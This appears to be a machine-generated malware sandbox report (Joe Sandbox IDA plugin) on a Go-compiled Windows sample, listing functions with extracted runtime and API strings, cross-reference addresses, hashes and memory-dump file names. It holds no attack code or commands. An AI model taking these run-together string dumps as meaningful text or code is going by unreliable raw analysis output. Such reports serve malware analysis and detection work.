String ID: B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons$ B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKh$ B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneifor$ B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriti$ exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateF$% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaS$+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??$pacer: panic: runningsignal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClas
API String ID: 0-3269668183
Opcode ID: 950f0dd92259e6998df798bc503f2f6067e929e6e14367c55d2bcf363333c1c1
Instruction ID: f98cccbd0e5da54c908479042320bbc3d3a9370aff07be12a53bcc32c56da094
Opcode Fuzzy Hash: 950f0dd92259e6998df798bc503f2f6067e929e6e14367c55d2bcf363333c1c1
Instruction Fuzzy Hash: 34918832719F4486DA01EB65E44135EB764FB89BC0F588722EE4E57B26DF38C491C710

Function 00A69680 Relevance: 10.2, Strings: 8, Instructions: 170COMMON

Download Yara Rule

Strings

called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standar, xrefs: 00A698F6
panicwrap: unexpected string after type name: reflect.Value.Slice: slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc h, xrefs: 00A697E8
panicwrap: no ) in reflect.Value.Bytesreflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat ov, xrefs: 00A6997F
pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeorgianGoStringGujaratiGurmukhiHiraganaIsWindowJavaneseKatakanaKayah_LiLine, xrefs: 00A69921
panicwrap: no ( in panicwrap: no ) in reflect.Value.Bytesreflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding, xrefs: 00A699C2
panicwrap: unexpected string after package name: reflect.Value.Slice: slice of unaddressable arrayruntime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left ou, xrefs: 00A69718
), xrefs: 00A697AE
value method xadd64 failedxchg64 failed}sched={pc: needspinning= nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitiali, xrefs: 00A69853

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standar$ pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeorgianGoStringGujaratiGurmukhiHiraganaIsWindowJavaneseKatakanaKayah_LiLine$)$panicwrap: no ( in panicwrap: no ) in reflect.Value.Bytesreflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding$panicwrap: no ) in reflect.Value.Bytesreflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat ov$panicwrap: unexpected string after package name: reflect.Value.Slice: slice of unaddressable arrayruntime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left ou$panicwrap: unexpected string after type name: reflect.Value.Slice: slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc h$value method xadd64 failedxchg64 failed}sched={pc: needspinning= nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitiali
API String ID: 0-317298172
Opcode ID: 36c6d0e45b63d5858f80d74cb5f50cf7a0cc945a63b19535cb424cbcc79529d0
Instruction ID: 40631b73b8593a41ff6cc1741cc0613b3ac20fe8c953acd3f724293e604a274f
Opcode Fuzzy Hash: 36c6d0e45b63d5858f80d74cb5f50cf7a0cc945a63b19535cb424cbcc79529d0
Instruction Fuzzy Hash: 5B816772319BC085DB64DB21F94139AB3A5F789B80F44922AEADD57B59EF3CC145CB00

Function 00A7C7C0 Relevance: 9.1, Strings: 7, Instructions: 382COMMON

Download Yara Rule

Strings

scanstack: goroutine not stoppedscavenger state is already wiredslice bounds out of range [%x::]slice bounds out of range [:%x:]slice bounds out of range [::%x]software caused connection abortsweep increased allocation countuse of closed network connection of , xrefs: 00A7CE1A
runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath=, xrefs: 00A7C9FE, 00A7CDBB
runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p state) must be a power of 223283064365386962, xrefs: 00A7CE47
mark - bad statusmarkBits overflownil resource bodyno data availablenotetsleepg on g0permission deniedreflect.Value.Intreflect.Value.Lenreflect: call of runtime.newosprocruntime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runti, xrefs: 00A7CA5D
, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS, xrefs: 00A7CA1C, 00A7CDD9, 00A7CE65
can't scan our own stackconnection reset by peerdouble traceGCSweepStartfloating point exceptionfunction not implementedgcDrainN phase incorrecthash of unhashable type level 2 not synchronizedlink number out of rangenot supported by windowsout of streams resou, xrefs: 00A7CD85
, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f, xrefs: 00A7CA37, 00A7CDF4, 00A7CE85

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: , goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS$, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f$can't scan our own stackconnection reset by peerdouble traceGCSweepStartfloating point exceptionfunction not implementedgcDrainN phase incorrecthash of unhashable type level 2 not synchronizedlink number out of rangenot supported by windowsout of streams resou$mark - bad statusmarkBits overflownil resource bodyno data availablenotetsleepg on g0permission deniedreflect.Value.Intreflect.Value.Lenreflect: call of runtime.newosprocruntime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runti$runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath=$runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p state) must be a power of 223283064365386962$scanstack: goroutine not stoppedscavenger state is already wiredslice bounds out of range [%x::]slice bounds out of range [:%x:]slice bounds out of range [::%x]software caused connection abortsweep increased allocation countuse of closed network connection of
API String ID: 0-701658967
Opcode ID: acfb9766a1827ca46bfc20a70489ee17e6ec7c7185990eb354fceb1ee99ba057
Instruction ID: afcef4c95e5f95dd0a9b1d7a9e1ec0aa85f62ebd318134e59273406ddb2e4933
Opcode Fuzzy Hash: acfb9766a1827ca46bfc20a70489ee17e6ec7c7185990eb354fceb1ee99ba057
Instruction Fuzzy Hash: 2F026A32708BC485DB64AB25E9813EEB7A0F789B90F48D12ADE9C47B1ADF38C544C741

Function 00AABF80 Relevance: 8.9, Strings: 7, Instructions: 172COMMON

Download Yara Rule

Strings

) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFileTypeIdeographicMedefaidrinMessageBoxWMoveFil, xrefs: 00AAC1EF
: no frame (sp=<invalid Value>ASCII_Hex_DigitAddDllDirectoryCLSIDFromStringCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetProcessTimesGetSe, xrefs: 00AAC1B4
runtime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser def, xrefs: 00AAC0F6, 00AAC18F
reflect mismatchremote I/O errorruntime: addr = runtime: base = runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*workbuf is empty spinningthreads=, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx1192092895507812559604644775390625: missing meth, xrefs: 00AAC125, 00AAC225
fp= is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfile, xrefs: 00AAC1CF
reflect.methodValueCallruntime: internal errorruntime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem , xrefs: 00AABFEC
reflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported method pcHeader.textStart= previous allocCou, xrefs: 00AAC006

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: fp= is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfile$) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFileTypeIdeographicMedefaidrinMessageBoxWMoveFil$: no frame (sp=<invalid Value>ASCII_Hex_DigitAddDllDirectoryCLSIDFromStringCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetProcessTimesGetSe$reflect mismatchremote I/O errorruntime: addr = runtime: base = runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*workbuf is empty spinningthreads=, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx1192092895507812559604644775390625: missing meth$reflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported method pcHeader.textStart= previous allocCou$reflect.methodValueCallruntime: internal errorruntime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem $runtime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser def
API String ID: 0-281528064
Opcode ID: ea36b26186ab11d1b7df91dc9d2542d514b29805e6d398a4a1bf33100f3af6b5
Instruction ID: fe8a32ad4b9e56d7aff5f0fc3c71eaf74a0c8cb48240cdc9b000e9f191575167
Opcode Fuzzy Hash: ea36b26186ab11d1b7df91dc9d2542d514b29805e6d398a4a1bf33100f3af6b5
Instruction Fuzzy Hash: 8E713936319B84C6DB10EB19E58035EB7A1F789BA0F585125EF9D47BA6CF38C840DB50

Function 00A900A0 Relevance: 8.8, Strings: 7, Instructions: 68COMMON

Download Yara Rule

Strings

powrprof, xrefs: 00A900C6
umeNotif, xrefs: 00A9012C
PowerReg, xrefs: 00A900FF
rof.dll, xrefs: 00A900D5
gisterSu, xrefs: 00A9010E
ication, xrefs: 00A9013B
spendRes, xrefs: 00A9011D

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: PowerReg$gisterSu$ication$powrprof$rof.dll$spendRes$umeNotif
API String ID: 0-941992356
Opcode ID: db11a9544b7a886fddfe7ba78ec296863522803898aeb4865b6bec6ade446899
Instruction ID: bfa664b78e889fc83dbc7c4f04fdc56a0a52a2d48f669a12342533681c68714f
Opcode Fuzzy Hash: db11a9544b7a886fddfe7ba78ec296863522803898aeb4865b6bec6ade446899
Instruction Fuzzy Hash: 033105B6208B80D5DA24DB11F44039AB7A5F785BC4F98812AEBDC47B6ADF39C155CB40

Function 00A61640 Relevance: 7.9, Strings: 6, Instructions: 445COMMON

Download Yara Rule

Strings

sse41sse42ssse3sudogsweeptraceuint8usagewrite B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetAC, xrefs: 00A6191F, 00A6193C
avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopenpathpipepop3quitreadrootsbrksmtpsse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930156, xrefs: 00A61B35, 00A61B52
ermsfileftpsfunchttpicmpidleigmpint8itabkindopenpathpipepop3quitreadrootsbrksmtpsse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLat, xrefs: 00A616A8
pclmulqdqpreemptedprofBlockpsapi.dllrecover: reflect: rwxrwxrwxscavtracestackpooltracebackwbufSpanswinmm.dll} stack=[ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= th, xrefs: 00A616C6
rdtscpselectsendtosocketstringstructsweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriot, xrefs: 00A616E7
popcntrdtscpselectsendtosocketstringstructsweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidC, xrefs: 00A61871, 00A6188F

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopenpathpipepop3quitreadrootsbrksmtpsse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930156$ermsfileftpsfunchttpicmpidleigmpint8itabkindopenpathpipepop3quitreadrootsbrksmtpsse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLat$pclmulqdqpreemptedprofBlockpsapi.dllrecover: reflect: rwxrwxrwxscavtracestackpooltracebackwbufSpanswinmm.dll} stack=[ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= th$popcntrdtscpselectsendtosocketstringstructsweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidC$rdtscpselectsendtosocketstringstructsweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type 